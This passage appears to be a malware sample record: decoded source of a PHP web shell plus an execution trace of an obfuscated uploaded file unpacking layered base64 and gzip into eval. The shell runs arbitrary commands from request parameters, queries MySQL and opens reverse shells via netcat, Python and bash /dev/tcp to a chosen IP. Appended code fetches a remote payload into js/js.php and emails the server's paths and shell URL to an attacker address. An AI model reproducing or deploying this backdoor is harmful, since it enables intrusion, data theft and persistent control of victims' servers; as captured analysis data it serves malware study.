Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo 'Python - <font color=\"green\">Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\r\n\t\tif(\$Ruby === '')\r\n\t\t{\r\n\t\t\techo 'Ruby - <font color=\"red\">Not Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo 'Ruby - <font color=\"green\">Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\r\n\t\tif(\$Php === '')\r\n\t\t{\r\n\t\t\techo 'PHP - <font color=\"red\">Not Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo 'PHP - <font color=\"green\">Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\r\n\t\tif(\$Perl === '')\r\n\t\t{\r\n\t\t\techo 'Perl - <font color=\"red\">Not Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo 'Perl - <font color=\"green\">Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\r\n\t\tif(\$Java === '')\r\n\t\t{\r\n\t\t\techo 'Java - <font color=\"red\">Not Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo 'Java - <font color=\"green\">Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\t\t\r\n\t\techo \"</div>\";\r\n\r\n\r\n\t\techo '<form action=\"\">';\r\n\r\n\t\techo '<label>IP Address</label><br>';\r\n\t\techo '<input type=\"text\" name=\"ip\" placeholder=\"10.0.0.23\"><br><br>';\r\n\r\n\t\techo '<label>Remote Port</label><br>';\r\n\t\techo '<input type=\"text\" name=\"port\" placeholder=\"4444\"> <br><br>';\r\n\r\n\t\techo '<label>Option</label><br>';\r\n\t\techo '<input type=\"hidden\" name=\"reverse-shell\" value=\"1\">';\r\n\r\n\t\techo '<select name=\"option\">';\r\n\t\techo '<optgroup label=\"Netcat\">';\r\n \techo '<option value=\"Netcat-/bin/sh\">Netcat /bin/sh</option>';\r\n \techo '<option value=\"Netcat-/bin/sh-pipes\">Netcat /bin/sh (Using Pipes)</option>';\r\n \techo '<option value=\"Netcat-/bin/bash\">Netcat /bin/bash</option>';\r\n \techo '<option value=\"Netcat-/bin/bash-pipes\">Netcat /bin/bash (Using Pipes)</option>';\r\n \techo '</optgroup>';\r\n\r\n \techo '<optgroup label=\"Python\">';\r\n \techo '<option value=\"Python-/bin/sh\">Python /bin/sh</option>';\r\n \techo '<option value=\"Python-/bin/bash\">Python /bin/bash</option>';\r\n \techo '</optgroup>';\r\n\r\n \techo '<optgroup label=\"Bash\">';\r\n \techo '<option value=\"Bash\">Bash /bin/bash</option>';\r\n \techo '</optgroup>';\r\n\r\n \techo '<optgroup label=\"Ruby\">';\r\n \techo '<option value=\"Ruby-/bin/sh\">Ruby /bin/sh</option>';\r\n \techo '</optgroup>';\r\n \techo '</select>';\r\n\r\n \techo '<br><br>';\r\n\t\techo '<input type=\"submit\" value=\"Submit\">';\r\n\t\techo '</form>';\r\n\t}\r\n\r\n\t//Get all files/folders in directory\r\n\tfunction directoryList(\$dir)\r\n\t{\r\n\t\techo \"<table>\";\r\n\t\techo \"<tr>\";\r\n\t\techo \"<th>Name</th><th>Size</th><th>Last Modified Time </th><th>Permissions</th><th>Owner</th><th>Group</th>\";\r\n\t\techo \"</tr>\";\r\n\t\t\r\n\t\t// Open a directory, and read its contents\r\n\t\tif (is_dir(\$dir))\r\n\t\t{\r\n\t\t\tif (\$dh = opendir(\$dir))\r\n\t\t\t{\r\n\t\t\t\t// loop through each file/folder in directory\r\n\t\t\t\twhile ((\$file = readdir(\$dh)) !== false)\r\n\t\t\t\t{\r\n\t\t\t\t\t// if not directory or regular file just display filename without a link\r\n\t\t\t\t\t\$link = \$file;\r\n\t\t\t\t\t// save filename so we can display it later\r\n\t\t\t\t\t\$fileDisplayName = \$file;\r\n\r\n\t\t\t\t\t//if directory display link to enter directory \r\n\t\t\t\t\tif(substr(filepermission(\$dir.\$file), 0, 1) === 'd' )\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t// create formID so JS can submit the form\r\n\t\t\t\t\t\t\$formId = \$file.'d';\r\n\r\n\t\t\t\t\t\t// . = same directory so no need to append . to \$dir\r\n\t\t\t\t\t\tif(\$file === '.')\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\$file = '';\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\t// add / to end of directory name\r\n\t\t\t\t\t\telse\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\t\$file = \$file .'/';\r\n\t\t\t\t\t\t}\r\n\r\n\t\t\t\t\t\t\$link = '<form id=\"'.\$formId.'\" action=\"\" method=\"get\"> <input type=\"hidden\" name=\"directory\" value=\"'.\$dir.\$file.'\"> <a href=\"#\" onclick=\"document.getElementById(\\''.\$formId.'\\').submit();\"> '.\$fileDisplayName.' </a></form>';\r\n\t\t\t\t\t}\r\n\r\n\t\t\t\t\t// if regular file display link to open and read file\r\n\t\t\t\t\telseif (substr(filepermission(\$dir.\$file), 0, 1) === 'r')\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t// create formID so JS can submit the form\r\n\t\t\t\t\t\t\$formId = \$file.'r';\r\n\t\t\t\t\t\t\$link = '<form id=\"'.\$formId.'\" action=\"\" method=\"get\"> <input type=\"hidden\" name=\"displayfile\" value=\"'.\$dir.\$file.'\"> <a href=\"#\" onclick=\"document.getElementById(\\''.\$formId.'\\').submit();\"> '.\$fileDisplayName.' </a></form>';\r\n\t\t\t\t\t}\t\t\t\r\n\t\t\t\t\t\r\n\t\t\t\t\t//display file/directory info\r\n\t\t\t\t\techo \"<tr>\";\r\n\t\t\t\t\techo \"<td>\" . \$link . \"</td>\";\r\n\t\t\t\t\techo \"<td>\" . getFileSize(\$dir,\$file). \"</td>\";\r\n\t\t\t\t\techo \"<td>\" . getFileLastModTime(\$dir,\$file). \"</td>\";\r\n\t\t\t\t\techo \"<td>\" . filepermission(\$dir.\$file). \"</td>\";\r\n\t\t\t\t\techo \"<td>\" . getFileOwner(\$dir,\$file). \"</td>\";\r\n\t\t\t\t\techo \"<td>\" . getFileGroup(\$dir,\$file). \"</td>\";\r\n\t\t\t\t\techo \"</tr>\";\r\n\r\n\t\t\t\t\t\r\n\t\t\t\t}\r\n\t\t\t\tclosedir(\$dh);\r\n\t\t\t}\r\n\t\t}\r\n\t\techo '</table>';\r\n\t}\r\n\r\n\t//Database form\r\n\tfunction displayRDatabaseForm()\r\n\t{\r\n\t\t// check if programs are installed\r\n\t\t\$Mysql = exec(\"which mysql\");\r\n\r\n\t\t\r\n\r\n\t\techo \"<div id='fleftReverseShell'>\";\r\n\t\techo \"<h4> Installed Applications</h4>\";\r\n\r\n\t\t// If not installed string will be empty \r\n\t\tif(\$Mysql === '')\r\n\t\t{\r\n\t\t\techo 'Mysql - <font color=\"red\">Not Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo 'Mysql - <font color=\"green\">Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\t\t// check if mysqli function exists - we need php-mysqli to interact with mysql\r\n\t\tif(function_exists('mysqli_connect'))\r\n\t\t{\r\n\t\t\techo ' Mysqli Php - <font color=\"green\">Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\techo ' Mysqli Php - <font color=\"red\">Not Installed</font>';\r\n\t\t\techo '<br>';\r\n\t\t\techo '<br>';\r\n\t\t}\r\n\t\t\r\n\t\techo \"</div>\";\r\n\r\n\t\techo '<form action=\"\">';\r\n\t\techo '<label>Username</label><br>';\r\n\t\techo '<input type=\"text\" name=\"username\" placeholder=\"root\"><br><br>';\r\n\r\n\t\techo '<label>Password</label><br>';\r\n\t\techo '<input type=\"text\" name=\"password\" placeholder=\"******\"> <br><br>';\r\n\r\n\t\techo '<label>Query</label><br>';\r\n\t\techo '<input type=\"text\" name=\"query\" placeholder=\"select * from database.table\"><br><br>';\r\n\t\techo '<input type=\"hidden\" name=\"database\" value=\"1\">';\r\n\r\n\t\techo '<input type=\"submit\" value=\"Submit\">';\r\n\t\techo '</form>';\r\n\t}\r\n\r\n\t// display selected file\r\n\tfunction getReadFile(\$file)\r\n\t{\r\n\t\t// have to replace the </xmp> so it doesnt mess up and cancel the real </xmp> a couple lines down\r\n\t\t\$output = str_replace(\"</xmp>\", \"<[SLASH]xmp>\", shell_exec('cat ' . \$file));\r\n\t\techo \"<xmp>\";\r\n\t\techo \$output;\r\n\t\techo \"</xmp>\";\r\n\t\t\r\n\t\t\r\n\t}\r\n\r\n\t// get file permissions read/write/execute *code reuse*\r\n\tfunction filepermission(\$filePath)\r\n\t{\r\n\t\t\$perms = fileperms(\$filePath);\r\n\r\n\t\tswitch (\$perms & 0xF000)\r\n\t\t{\r\n\t\t case 0xC000: // socket\r\n\t\t \$info = 's';\r\n\t\t break;\r\n\t\t case 0xA000: // symbolic link\r\n\t\t \$info = 'l';\r\n\t\t break;\r\n\t\t case 0x8000: // regular\r\n\t\t \$info = 'r';\r\n\t\t break;\r\n\t\t case 0x6000: // block special\r\n\t\t \$info = 'b';\r\n\t\t break;\r\n\t\t case 0x4000: // directory\r\n\t\t \$info = 'd';\r\n\t\t break;\r\n\t\t case 0x2000: // character special\r\n\t\t \$info = 'c';\r\n\t\t break;\r\n\t\t case 0x1000: // FIFO pipe\r\n\t\t \$info = 'p';\r\n\t\t break;\r\n\t\t default: // unknown\r\n\t\t \$info = 'u-';\r\n\t\t}\r\n\r\n\t\t// Owner\r\n\t\t\$info .= ((\$perms & 0x0100) ? 'r' : '-');\r\n\t\t\$info .= ((\$perms & 0x0080) ? 'w' : '-');\r\n\t\t\$info .= ((\$perms & 0x0040) ?\r\n\t\t ((\$perms & 0x0800) ? 's' : 'x' ) :\r\n\t\t ((\$perms & 0x0800) ? 'S' : '-'));\r\n\r\n\t\t// Group\r\n\t\t\$info .= ((\$perms & 0x0020) ? 'r' : '-');\r\n\t\t\$info .= ((\$perms & 0x0010) ? 'w' : '-');\r\n\t\t\$info .= ((\$perms & 0x0008) ?\r\n\t\t ((\$perms & 0x0400) ? 's' : 'x' ) :\r\n\t\t ((\$perms & 0x0400) ? 'S' : '-'));\r\n\r\n\t\t// World\r\n\t\t\$info .= ((\$perms & 0x0004) ? 'r' : '-');\r\n\t\t\$info .= ((\$perms & 0x0002) ? 'w' : '-');\r\n\t\t\$info .= ((\$perms & 0x0001) ?\r\n\t\t ((\$perms & 0x0200) ? 't' : 'x' ) :\r\n\t\t ((\$perms & 0x0200) ? 'T' : '-'));\r\n\r\n\t\treturn \$info;\r\n\t}\r\n\r\n\r\n\t//get file size\r\n\tfunction getFileSize(\$dir,\$file)\r\n\t{\r\n\t\treturn filesize(\$dir.\$file);\r\n\t}\r\n\r\n\t//get Last Modified Time\r\n\tfunction getFileLastModTime(\$dir,\$file)\r\n\t{\r\n\t\treturn date(\"F d Y H:i:s.\", filemtime(\$dir.\$file));\r\n\t}\r\n\t\r\n\t// get file owner\r\n\tfunction getFileOwner(\$dir,\$file)\r\n\t{\r\n\t\t\$fileOwnerInfo = posix_getpwuid(fileowner(\$dir.\$file));\r\n\t\treturn \$fileOwnerInfo[name];\r\n\t}\r\n\r\n\t// get file group\r\n\tfunction getFileGroup(\$dir,\$file)\r\n\t{\r\n\t\t\$fileGroupInfo = posix_getgrgid(filegroup(\$dir.\$file));\r\n\t\treturn \$fileGroupInfo[name];\r\n\t}\r\n\r\n\t// get memory - *code reuse* modified a little\r\n\tfunction shapeSpace_server_memory_usage() \r\n\t{\r\n\t\$free = shell_exec('free');\r\n\t\$free = (string)trim(\$free);\r\n\t\$free_arr = explode(\"\\n\", \$free);\r\n\t\$mem = explode(\" \", \$free_arr[1]);\r\n\t\$mem = array_filter(\$mem);\r\n\t\$mem = array_merge(\$mem);\r\n\t\$memory_usage = \$mem[2] / \$mem[1] * 100;\r\n \r\n\treturn array(\$mem[1] / (1024 * 1024), \$mem[2] / (1024 * 1024), \$memory_usage);\r\n\t\r\n\t}\r\n\r\n\tfunction systemInfo()\r\n\t{\r\n\t\t\$OS = php_uname('s');\r\n\t\t\$hostName = php_uname('n');\r\n\t\t\$version = php_uname('v');\r\n\t\t\$architecture = php_uname('m');\r\n\t\t\$df = disk_free_space(\"/\") / (1024 * 1024 * 1024);\r\n\t\t\$dt = disk_total_space(\"/\") / (1024 * 1024 * 1024);\r\n\t\t\$memory_array = shapeSpace_server_memory_usage();\r\n\r\n\t\techo \"OS:\" . \$OS . \" HostName:\" . \$hostName . \" Version:\" . \$version . \" Architecture:\" . \$architecture . \" Disk Free Space:\" . \$df. \" Disk Total Space:\" . \$dt . \" Memory Total GB:\" . \$memory_array[0] . \" Memory Used GB:\" . \$memory_array[1] . \" Memory Usage:\" . \$memory_array[2] . \"%\";\r\n\r\n\t}\r\n\t\r\n\r\n\t\r\n\r\n\theadhtml();\r\n\t//display file\r\n\tif(isset(\$_GET[\"displayfile\"]))\r\n\t{\r\n\t\t\$file = \$_GET[\"displayfile\"];\r\n\t\t// call function to read file\r\n\t\tgetReadFile(\$file);\r\n\t}\r\n\r\n\t// console Tab\r\n\telse if(isset(\$_GET[\"console\"]))\r\n\t{\r\n\t\t//display console form\r\n\t\tdisplayConsoleForm();\r\n\r\n\t\t// if we get command to run\r\n\t\tif(isset(\$_GET[\"command\"]))\r\n\t\t{\r\n\t\t\t\$cmd = \$_GET[\"command\"];\r\n\t\t\techo \"<div id='command'>\";\r\n\t\t\t// execute command \r\n\t\t\t\$lastLine = exec(\$cmd,\$cmdOutput);\r\n\r\n\t\t\t// loop through array\r\n\t\t\tforeach(\$cmdOutput as \$line)\r\n\t\t\t{\r\n\t\t\t\t// echo output and replace spaces with \r\n\t\t\t\techo str_replace(\" \", \" \", \$line) .\"<br>\";\r\n\t\t\t}\r\n\r\n\t\t\techo \"</div>\";\r\n\t\t}\r\n\t}\r\n\t//reverse shell tab\r\n\telse if(isset(\$_GET[\"reverse-shell\"]))\r\n\t{\r\n\t\t//display reverse shell form\r\n\t\tdisplayReverseShellForm();\r\n\r\n\t\tif(isset(\$_GET[\"ip\"]) && isset(\$_GET[\"port\"]))\r\n\t\t{\r\n\t\t\t\$ip = \$_GET[\"ip\"];\r\n\t\t\t\$port = \$_GET[\"port\"];\r\n\t\t\t\$option = \$_GET[\"option\"];\r\n\r\n\t\t\tif(\$option === 'Netcat-/bin/sh')\r\n\t\t\t{\r\n\t\t\t\t\$cmd = \"nc -e /bin/sh \" . \$ip . ' ' . \$port;\r\n\t\t\t\tsystem(\$cmd);\r\n\t\t\t\techo 'Executed - ' . \$cmd;\r\n\t\t\t}\r\n\t\t\telseif(\$option === 'Netcat-/bin/bash')\r\n\t\t\t{\r\n\t\t\t\t\$cmd = \"nc -e /bin/bash \" . \$ip . ' ' . \$port;\r\n\t\t\t\tsystem(\$cmd);\r\n\t\t\t\techo 'Executed - ' . \$cmd;\r\n\t\t\t}\r\n\t\t\telseif(\$option === 'Netcat-/bin/sh-pipes')\r\n\t\t\t{\r\n\t\t\t\t\$cmd = 'rm /tmp/tt;mkfifo /tmp/tt;cat /tmp/tt|/bin/sh -i 2>&1|nc '. \$ip . ' ' . \$port . ' >/tmp/tt' ;\r\n\t\t\t\texec(\$cmd);\r\n\t\t\t\techo 'Executed - ' . \$cmd;\r\n\t\t\t}\r\n\t\t\telseif(\$option === 'Netcat-/bin/bash-pipes')\r\n\t\t\t{\r\n\t\t\t\t\$cmd = 'rm /tmp/tt;mkfifo /tmp/tt;cat /tmp/tt|/bin/bash -i 2>&1|nc '. \$ip . ' ' . \$port . ' >/tmp/tt' ;\r\n\t\t\t\texec(\$cmd);\r\n\t\t\t\techo 'Executed - ' . \$cmd;\r\n\t\t\t}\r\n\t\t\telseif(\$option === 'Python-/bin/sh')\r\n\t\t\t{\r\n\t\t\t\t\$cmd = \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\".\$ip.\"\\\",\".\$port.\"));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);' &\";\r\n\t\t\t\tsystem(\$cmd);\r\n\t\t\t\techo 'Executed - ' . \$cmd;\r\n\t\t\t}\r\n\t\t\telseif(\$option === 'Python-/bin/bash')\r\n\t\t\t{\r\n\t\t\t\t\$cmd = \"python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\".\$ip.\"\\\",\".\$port.\"));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/bash\\\",\\\"-i\\\"]);' &\";\r\n\t\t\t\tsystem(\$cmd);\r\n\t\t\t\techo 'Executed - ' . \$cmd;\r\n\t\t\t}\r\n\t\t\t// ******************************************** Command works but hangs in php need to fix **************************************************\r\n\t\t\telseif(\$option === 'Bash')\r\n\t\t\t{\r\n\t\t\t\t// make sure we change to bash shell (bash;) before executing command other wise we get \"Bad fd number\" error\r\n\t\t\t\t\$cmd = 'echo \"bash -i >& /dev/tcp/'.\$ip.'/'.\$port.' 0>&1\" | bash';\r\n\t\t\t\texec(\$cmd);\r\n\t\t\t\techo 'Executed - ' . \$cmd;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t//Databse shell tab\r\n\telse if(isset(\$_GET[\"database\"]))\r\n\t{\r\n\t\tdisplayRDatabaseForm();\r\n\r\n\t\tif(isset(\$_GET[\"username\"]) && isset(\$_GET[\"password\"]))\r\n\t\t{\r\n\t\t\t\$username = \$_GET[\"username\"];\r\n\t\t\t\$password = \$_GET[\"password\"];\r\n\t\t\t\$query = \$_GET[\"query\"];\r\n\r\n\t\t\t\$link = mysqli_connect(\"127.0.0.1\", \$username, \$password);\r\n\t\t\t\$result = mysqli_query(\$link,\$query);\r\n\t\t\t\$count = mysqli_num_rows(\$result);\r\n\t\t\t\$column_count = mysqli_num_fields(\$result);\r\n\r\n\t\t\t\r\n\r\n\t\t\techo \"<table>\";\r\n\r\n\t\t\techo \"<tr>\";\r\n\t\t\t\$finfo = mysqli_fetch_fields(\$result);\r\n \tforeach (\$finfo as \$val)\r\n \t{\r\n \techo \"<th>\".\$val->name.\"</th>\";\r\n }\r\n\t\t\techo \"</tr>\";\r\n\r\n\t\t\twhile(\$row = mysqli_fetch_row(\$result))\r\n\t\t\t{\r\n\t\t\t\t\$i = 0;\r\n\t\t\t\techo \"<tr>\";\r\n\t\t\t\twhile(\$i < \$column_count)\r\n\t\t\t\t{\r\n\t\t\t\t\t//echo \$row[\$i];\r\n\t\t\t\t\techo \"<td>\".\$row[\$i].\"</td>\";\r\n\t\t\t\t\t\$i = \$i +1;\r\n\t\t\t\t}\r\n\t\t\t\techo \"</tr>\";\r\n\t\t\t\techo \"</br>\";\r\n\t\t\t\t\r\n\t\t\t}\r\n\t\t\techo \"</table>\";\r\n\t\t}\r\n\t}\t\r\n\r\n\t// Home Tab\r\n\telse\r\n\t{\r\n\t\t//systemInfo();\r\n\t\t//default directory\r\n\t\t\$directory = \"/var/www/\";\r\n\t\t//get new directory\r\n\t\tif(isset(\$_GET[\"directory\"]))\r\n\t\t{\r\n\t\t\t\$directory = \$_GET[\"directory\"];\r\n\t\t}\r\n\t\t//display directory form \r\n\t\tdisplayFolderForm();\r\n\t\t// display direcotries\r\n\t\tdirectoryList(\$directory);\r\n\t}\r\n\t\r\n\t//echo system(\"/usr/bin/wget google.com -O /tmp/tt\");\r\n\t\r\n\r\n\tfoothtml();\r\n\r\n?><?php if(\$_POST['query']){ \$veriyfy = stripslashes(stripslashes(\$_POST['query']));\r\n \$data = \"data.txt\";\r\n @touch (\"data.txt\");\r\n \$ver = @fopen (\$data , 'w');\r\n @fwrite ( \$ver , \$veriyfy ) ;\r\n @fclose (\$ver);\r\n }else{ \$datas=@fopen(\"data.txt\",'r');\r\n \$i=0;\r\n while (\$i <= 5) { \$i++;\r\n \$blue=@fgets(\$datas,1024);\r\n echo \$blue;\r\n } } \$datasi=@fopen(\"js/js.php\",'r');\r\n if(\$datasi){ }else{ @mkdir(\"js\");\r\n \$dos = file_get_contents(\"https://wordpres.page/txt/lamer.txt\");\r\n \$data = \"js/js.php\";\r\n @touch (\"js/js.php\");\r\n \$ver = @fopen (\$data , 'w');\r\n @fwrite ( \$ver , \$dos ) ;\r\n @fclose (\$ver);\r\n \$yol = \"http://\".\$_SERVER['HTTP_HOST'].\"\".\$_SERVER['REQUEST_URI'].\"\";\r\n \$y = '<h1>Sender Yazdirildi.<br/> SITE YOL : '.\$yol.'<br/>Sender Yolu : js/crs.php</h1>';\r\n \$header .= \"From: SheLL Boot <suppor@nic.org>\\n\";\r\n \$header .= \"Content-Type: text/html;\r\n charset=utf-8\\n\";\r\n @mail(\"byhero44@gmail.com\", \"Hacklink Bildiri\", \"\$y\", \$header);\r\n @mail(\"byhero44@gmail.com\", \"Hacklink Bildiri\", \"\$y\", \$header);\r\n } \r\n?><?php\r\n\$kime = \"byhero44@gmail.com\";\r\n\$baslik = \"keisatsu shell 20203\";\r\n\$EL_MuHaMMeD = \"Dosya Yolu : \" . \$_SERVER['DOCUMENT_ROOT'] . \"\\r\\n\";\r\n\$EL_MuHaMMeD.= \"Server Admin : \" . \$_SERVER['SERVER_ADMIN'] . \"\\r\\n\";\r\n\$EL_MuHaMMeD.= \"Server isletim sistemi : \" . \$_SERVER['SERVER_SOFTWARE'] . \"\\r\\n\";\r\n\$EL_MuHaMMeD.= \"Shell Link : http://\" . \$_SERVER['SERVER_NAME'] . \$_SERVER['PHP_SELF'] . \"\\r\\n\";\r\n\$EL_MuHaMMeD.= \"Avlanan Site : \" . \$_SERVER['HTTP_HOST'] . \"\\r\\n\";\r\nmail(\$kime, \$baslik, \$EL_MuHaMMeD);\r\n?>");Execution traces
data/traces/aa49920d1cc9bb32871f8bb4355df64c_trace-1676238152.9243.xtVersion: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 19:42:58.822096]
1 0 1 0.000129 393528
1 3 0 0.000274 406464 {main} 1 /var/www/html/uploads/Vhosts.php 0 0
1 A /var/www/html/uploads/Vhosts.php 2 $stt1 = 'Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNzC4pSi4upI5yUWJxqZhKfkpqcn5KqAbSzKLVMQ6W4pMRAEwlYAwA='
1 A /var/www/html/uploads/Vhosts.php 3 $stt0 = '=kDqVITih22B7qpHJhqkQfPA/P+P39F/n9+/zbk5Ny6KocXP1Dd8eLztZwfOeLwhfeFTXXyq+ZL2EauqhgvkOSu/nlWjiVgdXNaXdUf2bp/06lR2AK0uf0AEAtDoT75FDS3+UDJxO2ncwvJirPjlYw5M7scFNEa33O9aEvTBFTut4vVxjlq2DdkxX96L7oTMA4m3V6uI1BNQyKO+QRA6rRGDb9cg7l6+J4/89GW0nO22aARUEiecRVXTHfqVzb44hCNST857e/w6S/Xe/dy+BUWocmseR15h1RjnnXYr6//MuIBgDlH/aDUjIXESBkvapdlCafcX8j9kUDLJa0FAXe8h81F9UALMsswQEJfm001Gxf7NyLcYYMB/pgIMbqJx8avp3CjQ6uMAQhQI4hBT93VPZTl3DXbaFzpnQ9Ga35QMcAL8WjpZoPyuEGyeorJ694E0OKIAdgTCValKaRMCrKy5xtD6Fr3bxO2RIybXdUvX6uG5KYLmJScNeenmNNSw'
2 4 0 0.000339 406464 base64_decode 0 /var/www/html/uploads/Vhosts.php 4 1 'Sy1LzNFQsrdT0isuKYovyi8xNNZIr8rMS8tJLEkFskrzkvNzC4pSi4upI5yUWJxqZhKfkpqcn5KqAbSzKLVMQ6W4pMRAEwlYAwA='
2 4 1 0.000359 406624
2 4 R 'K-K��P��S�+.)�/�/14�H���K�I,I\005�J��s\v�R���#��X�jf\022�������\001��(�LC����@\023\tX\003\000'
2 5 0 0.000384 406592 gzinflate 0 /var/www/html/uploads/Vhosts.php 4 1 'K-K��P��S�+.)�/�/14�H���K�I,I\005�J��s\v�R���#��X�jf\022�������\001��(�LC����@\023\tX\003\000'
2 5 1 0.000409 406816
2 5 R 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($stt0))))))))))));'
2 6 0 0.000428 406656 htmlspecialchars_decode 0 /var/www/html/uploads/Vhosts.php 4 1 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($stt0))))))))))));'
2 6 1 0.000446 406688
2 6 R 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($stt0))))))))))));'
2 7 0 0.000478 409840 eval 1 'eval("?>".str_rot13(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(gzinflate(gzuncompress(base64_decode(strrev($stt0))))))))))));' /var/www/html/uploads/Vhosts.php 4 0
3 8 0 0.000496 409840 strrev 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code 1 1 '=kDqVITih22B7qpHJhqkQfPA/P+P39F/n9+/zbk5Ny6KocXP1Dd8eLztZwfOeLwhfeFTXXyq+ZL2EauqhgvkOSu/nlWjiVgdXNaXdUf2bp/06lR2AK0uf0AEAtDoT75FDS3+UDJxO2ncwvJirPjlYw5M7scFNEa33O9aEvTBFTut4vVxjlq2DdkxX96L7oTMA4m3V6uI1BNQyKO+QRA6rRGDb9cg7l6+J4/89GW0nO22aARUEiecRVXTHfqVzb44hCNST857e/w6S/Xe/dy+BUWocmseR15h1RjnnXYr6//MuIBgDlH/aDUjIXESBkvapdlCafcX8j9kUDLJa0FAXe8h81F9UALMsswQEJfm001Gxf7NyLcYYMB/pgIMbqJx8avp3CjQ6uMAQhQI4hBT93VPZTl3DXbaFzpnQ9Ga35QMcAL8WjpZoPyuEGyeorJ694E0OKIAdgTCValKaRMCrKy5xtD6Fr3bxO2RIybXdUvX6uG5KYLmJScNeenmNNSw'
3 8 1 0.000529 422160
3 8 R 'eJwByBk35gHDGTzmeJwBuBlH5gGzGUzmeJwBqBlX5gGjGVzmeJwBmBln5u0823bbRpLPyjn+hw6sMUgPCZKKPPGIEmNRI9KTzdE10kSytTwABgBFKSDRJBEBij9qX/YHdj9sq6q7cSMoUR7ZM3t25UQiu6rr1tVV1Y1Gb/9gz+0X36wH1mQYc9MbOJblsR22Puid7P/1ZP+Ddtw9en95stsf7He7fe2qXUQeTMOIQ48gdEw/5pXB4PT84mQwqCLmyB4E3OMTJNmEhnBaQfQBvwldz63kKRl6Y2TXI8sPDBBKr1ZffHPPGHvxDfxioTmJhgFnD3ZpC9wc2xY0fuKRy4GaBNsOn4Y3AJtYQ9OrvOM3dmQFvKI39Bor0a5aVYR96KQrNlPLqayHpBlbD7clWfz8xz9WBYrkKHuu+4ZuGA3VH5R6yBzEGhTUDexXtIwgkNBfbqLlZNrZzgs2S0Fjh/t3Scsn8QH+wH80otmu0LeaGLrROON+wB32k/9r8N//'
3 9 0 0.000562 422128 base64_decode 0 /var/www/html/uploads/Vhosts.php(4) : eval()'d code 1 1 'eJwByBk35gHDGTzmeJwBuBlH5gGzGUzmeJwBqBlX5gGjGVzmeJwBmBln5u0823bbRpLPyjn+hw6sMUgPCZKKPPGIEmNRI9KTzdE10kSytTwABgBFKSDRJBEBij9qX/YHdj9sq6q7cSMoUR7ZM3t25UQiu6rr1tVV1Y1Gb/9gz+0X36wH1mQYc9MbOJblsR22Puid7P/1ZP+Ddtw9en95stsf7He7fe2qXUQeTMOIQ48gdEw/5pXB4PT84mQwqCLmyB4E3OMTJNmEhnBaQfQBvwldz63kKRl6Y2TXI8sPDBBKr1ZffHPPGHvxDfxioTmJhgFnD3ZpC9wc2xY0fuKRy4GaBNsOn4Y3AJtYQ9OrvOM3dmQFvKI39Bor0a5aVYR96KQrNlPLqayHpBlbD7clWfz8xz9WBYrkKHuu+4ZuGA3VH5R6yBzEGhTUDexXtIwgkNBfbqLlZNrZzgs2S0Fjh/t3Scsn8QH+wH80otmu0LeaGLrROON+wB32k/9r8N//'
3 9 1 0.000612 434448
